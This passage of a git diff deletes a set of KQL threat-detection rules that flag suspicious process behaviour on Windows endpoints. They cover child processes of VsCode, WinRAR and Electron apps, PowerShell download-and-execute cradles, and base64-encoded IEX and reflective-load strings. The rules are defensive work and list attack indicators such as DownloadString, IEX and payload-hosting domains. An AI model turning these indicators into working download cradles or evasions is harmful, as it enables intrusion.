@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/12
-// Level: medium
-// Description: Detects potentially suspicious child processes of a ClickOnce deployment application
-// Tags: attack.execution, attack.defense_evasion
-DeviceProcessEvents
-| where (FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\werfault.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath contains "\\AppData\\Local\\Apps\\2.0\\"
\ No newline at end of file
diff --git a/Execution/Potentially_Suspicious_Child_Process_Of_VsCode.kql b/Execution/Potentially_Suspicious_Child_Process_Of_VsCode.kql
deleted file mode 100644
index 4dc7fab5..00000000
--- a/Execution/Potentially_Suspicious_Child_Process_Of_VsCode.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/26
-// Level: medium
-// Description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.
-// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\code.exe" and (((ProcessCommandLine contains "Invoke-Expressions" or ProcessCommandLine contains "IEX" or ProcessCommandLine contains "Invoke-Command" or ProcessCommandLine contains "ICM" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe")) or (FolderPath endswith "\\calc.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Temp\\"))
\ No newline at end of file
diff --git a/Execution/Potentially_Suspicious_Child_Process_Of_WinRAR.EXE.kql b/Execution/Potentially_Suspicious_Child_Process_Of_WinRAR.EXE.kql
deleted file mode 100644
index 0c3792ca..00000000
--- a/Execution/Potentially_Suspicious_Child_Process_Of_WinRAR.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/31
-// Level: medium
-// Description: Detects potentially suspicious child processes of WinRAR.exe.
-// Tags: attack.execution, attack.t1203
-DeviceProcessEvents
-| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE", "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\WinRAR.exe"
\ No newline at end of file
diff --git a/Execution/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql b/Execution/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql
deleted file mode 100644
index a30d1353..00000000
--- a/Execution/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2024/05/13
-// Level: medium
-// Description: Detects potentially suspicious child processes of KeyScrambler.exe
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1203, attack.t1574.002
-DeviceProcessEvents
-| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE", "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\KeyScrambler.exe"
\ No newline at end of file
diff --git a/Execution/Potentially_Suspicious_Electron_Application_CommandLine.kql b/Execution/Potentially_Suspicious_Electron_Application_CommandLine.kql
deleted file mode 100644
index 9450e461..00000000
--- a/Execution/Potentially_Suspicious_Electron_Application_CommandLine.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/09/05
-// Level: medium
-// Description: Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary.
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine contains "--browser-subprocess-path" or ProcessCommandLine contains "--gpu-launcher" or ProcessCommandLine contains "--renderer-cmd-prefix" or ProcessCommandLine contains "--utility-cmd-prefix") and ((FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\code.exe" or FolderPath endswith "\\discord.exe" or FolderPath endswith "\\GitHubDesktop.exe" or FolderPath endswith "\\keybase.exe" or FolderPath endswith "\\msedge_proxy.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\msedgewebview2.exe" or FolderPath endswith "\\msteams.exe" or FolderPath endswith "\\slack.exe" or FolderPath endswith "\\Teams.exe") or (ProcessVersionInfoOriginalFileName in~ ("chrome.exe", "code.exe", "discord.exe", "GitHubDesktop.exe", "keybase.exe", "msedge_proxy.exe", "msedge.exe", "msedgewebview2.exe", "msteams.exe", "slack.exe", "Teams.exe")))
\ No newline at end of file
diff --git a/Execution/Potentially_Suspicious_Execution_Of_PDQDeployRunner.kql b/Execution/Potentially_Suspicious_Execution_Of_PDQDeployRunner.kql
deleted file mode 100644
index b775a211..00000000
--- a/Execution/Potentially_Suspicious_Execution_Of_PDQDeployRunner.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/22
-// Level: medium
-// Description: Detects suspicious execution of "PDQDeployRunner" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines
-// Tags: attack.execution
-DeviceProcessEvents
-| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\csc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe") or (FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\TEMP\\" or FolderPath contains "\\AppData\\Local\\Temp") or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -encodedcommand " or ProcessCommandLine contains " -w hidden" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "http" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "Invoke-")) and InitiatingProcessFolderPath contains "\\PDQDeployRunner-"
\ No newline at end of file
diff --git a/Execution/Potentially_Suspicious_File_Download_From_File_Sharing_Domain_Via_PowerShell.EXE.kql b/Execution/Potentially_Suspicious_File_Download_From_File_Sharing_Domain_Via_PowerShell.EXE.kql
deleted file mode 100644
index d5ba34b0..00000000
--- a/Execution/Potentially_Suspicious_File_Download_From_File_Sharing_Domain_Via_PowerShell.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/02/23
-// Level: high
-// Description: Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget ") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "cdn.discordapp.com/attachments/" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "ufile.io")
\ No newline at end of file
diff --git a/Execution/Potentially_Suspicious_PowerShell_Child_Processes.kql b/Execution/Potentially_Suspicious_PowerShell_Child_Processes.kql
deleted file mode 100644
index 9a025e0f..00000000
--- a/Execution/Potentially_Suspicious_PowerShell_Child_Processes.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Tim Shelton
-// Date: 2022/04/26
-// Level: high
-// Description: Detects potentially suspicious child processes spawned by PowerShell
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and (InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (not((ProcessCommandLine contains "\\Program Files\\Amazon\\WorkspacesConfig\\Scripts\\" and InitiatingProcessCommandLine contains "\\Program Files\\Amazon\\WorkspacesConfig\\Scripts\\")))
\ No newline at end of file
diff --git a/Execution/Potentially_Suspicious_WebDAV_LNK_Execution.kql b/Execution/Potentially_Suspicious_WebDAV_LNK_Execution.kql
deleted file mode 100644
index f6568258..00000000
--- a/Execution/Potentially_Suspicious_WebDAV_LNK_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Micah Babinski
-// Date: 2023/08/21
-// Level: medium
-// Description: Detects possible execution via LNK file accessed on a WebDAV server.
-// Tags: attack.execution, attack.t1059.001, attack.t1204
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\DavWWWRoot\\" and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\explorer.exe"
\ No newline at end of file
diff --git a/Execution/PowerShell_Base64_Encoded_FromBase64String_Cmdlet.kql b/Execution/PowerShell_Base64_Encoded_FromBase64String_Cmdlet.kql
deleted file mode 100644
index e2931fc4..00000000
--- a/Execution/PowerShell_Base64_Encoded_FromBase64String_Cmdlet.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/08/24
-// Level: high
-// Description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line
-// Tags: attack.defense_evasion, attack.t1140, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "OjpGcm9tQmFzZTY0U3RyaW5n" or ProcessCommandLine contains "o6RnJvbUJhc2U2NFN0cmluZ" or ProcessCommandLine contains "6OkZyb21CYXNlNjRTdHJpbm" or (ProcessCommandLine contains "OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA" or ProcessCommandLine contains "oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA" or ProcessCommandLine contains "6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw")
\ No newline at end of file
diff --git a/Execution/PowerShell_Base64_Encoded_IEX_Cmdlet.kql b/Execution/PowerShell_Base64_Encoded_IEX_Cmdlet.kql
deleted file mode 100644
index 3f4eb318..00000000
--- a/Execution/PowerShell_Base64_Encoded_IEX_Cmdlet.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/08/23
-// Level: high
-// Description: Detects usage of a base64 encoded "IEX" cmdlet in a process command line
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "SUVYIChb" or ProcessCommandLine contains "lFWCAoW" or ProcessCommandLine contains "JRVggKF" or ProcessCommandLine contains "aWV4IChb" or ProcessCommandLine contains "lleCAoW" or ProcessCommandLine contains "pZXggKF" or ProcessCommandLine contains "aWV4IChOZX" or ProcessCommandLine contains "lleCAoTmV3" or ProcessCommandLine contains "pZXggKE5ld" or ProcessCommandLine contains "SUVYIChOZX" or ProcessCommandLine contains "lFWCAoTmV3" or ProcessCommandLine contains "JRVggKE5ld" or ProcessCommandLine contains "SUVYKF" or ProcessCommandLine contains "lFWChb" or ProcessCommandLine contains "JRVgoW" or ProcessCommandLine contains "aWV4KF" or ProcessCommandLine contains "lleChb" or ProcessCommandLine contains "pZXgoW" or ProcessCommandLine contains "aWV4KE5ld" or ProcessCommandLine contains "lleChOZX" or ProcessCommandLine contains "pZXgoTmV3" or ProcessCommandLine contains "SUVYKE5ld" or ProcessCommandLine contains "lFWChOZX" or ProcessCommandLine contains "JRVgoTmV3" or ProcessCommandLine contains "SUVYKCgn" or ProcessCommandLine contains "lFWCgoJ" or ProcessCommandLine contains "JRVgoKC" or ProcessCommandLine contains "aWV4KCgn" or ProcessCommandLine contains "lleCgoJ" or ProcessCommandLine contains "pZXgoKC") or (ProcessCommandLine contains "SQBFAFgAIAAoAFsA" or ProcessCommandLine contains "kARQBYACAAKABbA" or ProcessCommandLine contains "JAEUAWAAgACgAWw" or ProcessCommandLine contains "aQBlAHgAIAAoAFsA" or ProcessCommandLine contains "kAZQB4ACAAKABbA" or ProcessCommandLine contains "pAGUAeAAgACgAWw" or ProcessCommandLine contains "aQBlAHgAIAAoAE4AZQB3A" or ProcessCommandLine contains "kAZQB4ACAAKABOAGUAdw" or ProcessCommandLine contains "pAGUAeAAgACgATgBlAHcA" or ProcessCommandLine
contains "SQBFAFgAIAAoAE4AZQB3A" or ProcessCommandLine contains "kARQBYACAAKABOAGUAdw" or ProcessCommandLine contains "JAEUAWAAgACgATgBlAHcA")
\ No newline at end of file
diff --git a/Execution/PowerShell_Base64_Encoded_Invoke_Keyword.kql b/Execution/PowerShell_Base64_Encoded_Invoke_Keyword.kql
deleted file mode 100644
index be3160c2..00000000
--- a/Execution/PowerShell_Base64_Encoded_Invoke_Keyword.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t
-// Date: 2022/05/20
-// Level: high
-// Description: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where ProcessCommandLine contains " -e" and (ProcessCommandLine contains "SQBuAHYAbwBrAGUALQ" or ProcessCommandLine contains "kAbgB2AG8AawBlAC0A" or ProcessCommandLine contains "JAG4AdgBvAGsAZQAtA" or ProcessCommandLine contains "SW52b2tlL" or ProcessCommandLine contains "ludm9rZS" or ProcessCommandLine contains "JbnZva2Ut") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Execution/PowerShell_Base64_Encoded_Reflective_Assembly_Load.kql b/Execution/PowerShell_Base64_Encoded_Reflective_Assembly_Load.kql
deleted file mode 100644
index 7b67f975..00000000
--- a/Execution/PowerShell_Base64_Encoded_Reflective_Assembly_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems), pH-T (Nextron Systems)
-// Date: 2022/03/01
-// Level: high
-// Description: Detects base64 encoded .NET reflective loading of Assembly
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027, attack.t1620
-DeviceProcessEvents
-| where ProcessCommandLine contains "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA" or ProcessCommandLine contains "sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA" or ProcessCommandLine contains "bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA" or ProcessCommandLine contains "AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC" or ProcessCommandLine contains "BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp" or ProcessCommandLine contains "AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK" or ProcessCommandLine contains "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ" or ProcessCommandLine contains "sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA" or ProcessCommandLine contains "bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA" or ProcessCommandLine contains "WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA" or ProcessCommandLine contains "sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA" or ProcessCommandLine contains "bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA"
\ No newline at end of file
diff --git a/Execution/PowerShell_Base64_Encoded_WMI_Classes.kql b/Execution/PowerShell_Base64_Encoded_WMI_Classes.kql
deleted file mode 100644
index 78c3b4de..00000000
--- a/Execution/PowerShell_Base64_Encoded_WMI_Classes.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/30
-// Level: high
-// Description: Detects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc.
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and ((ProcessCommandLine contains "VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA" or ProcessCommandLine contains "cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg" or ProcessCommandLine contains "V2luMzJfTG9nZ2VkT25Vc2Vy" or ProcessCommandLine contains "dpbjMyX0xvZ2dlZE9uVXNlc" or ProcessCommandLine contains "XaW4zMl9Mb2dnZWRPblVzZX") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw" or ProcessCommandLine contains "cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA" or ProcessCommandLine contains "V2luMzJfUHJvY2Vzc" or ProcessCommandLine contains "dpbjMyX1Byb2Nlc3" or ProcessCommandLine contains "XaW4zMl9Qcm9jZXNz") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA" or ProcessCommandLine contains "cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg" or ProcessCommandLine contains "V2luMzJfU2NoZWR1bGVkSm9i" or ProcessCommandLine contains "dpbjMyX1NjaGVkdWxlZEpvY" or ProcessCommandLine contains "XaW4zMl9TY2hlZHVsZWRKb2") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ" or ProcessCommandLine contains "cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A" or ProcessCommandLine contains
"V2luMzJfU2hhZG93Y29we" or ProcessCommandLine contains "dpbjMyX1NoYWRvd2NvcH" or ProcessCommandLine contains "XaW4zMl9TaGFkb3djb3B5") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A" or ProcessCommandLine contains "cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA" or ProcessCommandLine contains "V2luMzJfVXNlckFjY291bn" or ProcessCommandLine contains "dpbjMyX1VzZXJBY2NvdW50" or ProcessCommandLine contains "XaW4zMl9Vc2VyQWNjb3Vud"))
\ No newline at end of file
diff --git a/Execution/PowerShell_Core_DLL_Loaded_By_Non_PowerShell_Process.kql b/Execution/PowerShell_Core_DLL_Loaded_By_Non_PowerShell_Process.kql
deleted file mode 100644
index 1036a4ff..00000000
--- a/Execution/PowerShell_Core_DLL_Loaded_By_Non_PowerShell_Process.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2019/11/14
-// Level: medium
-// Description: Detects loading of essential DLLs used by PowerShell by non-PowerShell process.
-Detects behavior similar to meterpreter's "load powershell" extension.
-
-// Tags: attack.t1059.001, attack.execution
-DeviceImageLoadEvents
-| where (InitiatingProcessVersionInfoFileDescription =~ "System.Management.Automation" or InitiatingProcessVersionInfoOriginalFileName =~ "System.Management.Automation.dll" or (FolderPath endswith "\\System.Management.Automation.dll" or FolderPath endswith "\\System.Management.Automation.ni.dll")) and (not((((InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\") and InitiatingProcessFolderPath endswith "\\mscorsvw.exe") or (InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\dsac.exe" or InitiatingProcessFolderPath endswith ":\\WINDOWS\\System32\\RemoteFXvGPUDisablement.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\runscripthelper.exe" or InitiatingProcessFolderPath endswith ":\\WINDOWS\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\ServerManager.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\SyncAppvPublishingServer.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\winrshost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\wsmprovhost.exe" or InitiatingProcessFolderPath endswith
":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\winrshost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\wsmprovhost.exe")))) and (not((isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath contains ":\\ProgramData\\chocolatey\\choco.exe" or InitiatingProcessFolderPath endswith "\\Citrix\\ConfigSync\\ConfigSyncRun.exe" or (InitiatingProcessFolderPath contains ":\\Windows\\Temp\\asgard2-agent\\" and (InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\thor.exe")) or ((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft SQL Server Management Studio" or InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft SQL Server Management Studio") and InitiatingProcessFolderPath endswith "\\IDE\\Ssms.exe") or ((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft SQL Server\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft SQL Server\\") and InitiatingProcessFolderPath endswith "\\Tools\\Binn\\SQLPS.exe") or (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Visual Studio\\"))))
\ No newline at end of file
diff --git a/Execution/PowerShell_DownloadFile.kql b/Execution/PowerShell_DownloadFile.kql
deleted file mode 100644
index da7ff4be..00000000
--- a/Execution/PowerShell_DownloadFile.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020/08/28
-// Level: high
-// Description: Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line
-// Tags: attack.execution, attack.t1059.001, attack.command_and_control, attack.t1104, attack.t1105
-DeviceProcessEvents
-| where ProcessCommandLine contains "powershell" and ProcessCommandLine contains ".DownloadFile" and ProcessCommandLine contains "System.Net.WebClient"
\ No newline at end of file
diff --git a/Execution/PowerShell_Download_Pattern.kql b/Execution/PowerShell_Download_Pattern.kql
deleted file mode 100644
index cdfb87e6..00000000
--- a/Execution/PowerShell_Download_Pattern.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects a Powershell process that contains download commands in its command line string
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "string(" or ProcessCommandLine contains "file(") and (ProcessCommandLine contains "new-object" and ProcessCommandLine contains "net.webclient)." and ProcessCommandLine contains "download")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Execution/PowerShell_Download_and_Execution_Cradles.kql b/Execution/PowerShell_Download_and_Execution_Cradles.kql
deleted file mode 100644
index 9e3c6d09..00000000
--- a/Execution/PowerShell_Download_and_Execution_Cradles.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/03/24
-// Level: high
-// Description: Detects PowerShell download and execution cradles.
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
